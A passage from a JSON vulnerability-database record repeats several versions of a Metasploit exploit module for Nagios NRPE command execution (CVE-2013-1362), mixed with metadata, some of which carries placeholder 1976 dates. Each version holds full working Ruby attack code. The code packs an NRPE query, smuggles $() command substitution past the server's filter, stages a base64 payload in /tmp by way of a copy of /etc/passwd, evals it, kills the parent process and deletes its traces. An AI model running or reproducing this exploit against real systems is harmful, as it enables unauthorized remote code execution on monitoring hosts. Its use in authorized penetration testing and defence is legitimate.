it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-06T09:01:25", "differentElements": ["modified", "published"], "edition": 44}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-06T10:58:24", "history": [], "viewCount": 79, "enchantments": {"score": {"value": 6.0, "modified": "2018-03-06T10:58:24"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-06T10:58:24", "differentElements": ["modified", "published"], "edition": 45}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-12T13:14:35", "history": [], "viewCount": 79, "enchantments": {"score": {"value": 6.0, "modified": "2018-03-12T13:14:35"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-12T13:14:35", "differentElements": ["modified", "published"], "edition": 46}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-12T15:23:42", "history": [], "viewCount": 79, "enchantments": {"score": {"value": 6.0, "modified": "2018-03-12T15:23:42"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-12T15:23:42", "differentElements": ["modified", "published"], "edition": 47}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-16T11:44:05", "history": [], "viewCount": 79, "enchantments": {"score": {"value": 6.0, "modified": "2018-03-16T11:44:05"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-16T11:44:05", "differentElements": ["modified", "published"], "edition": 48}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, 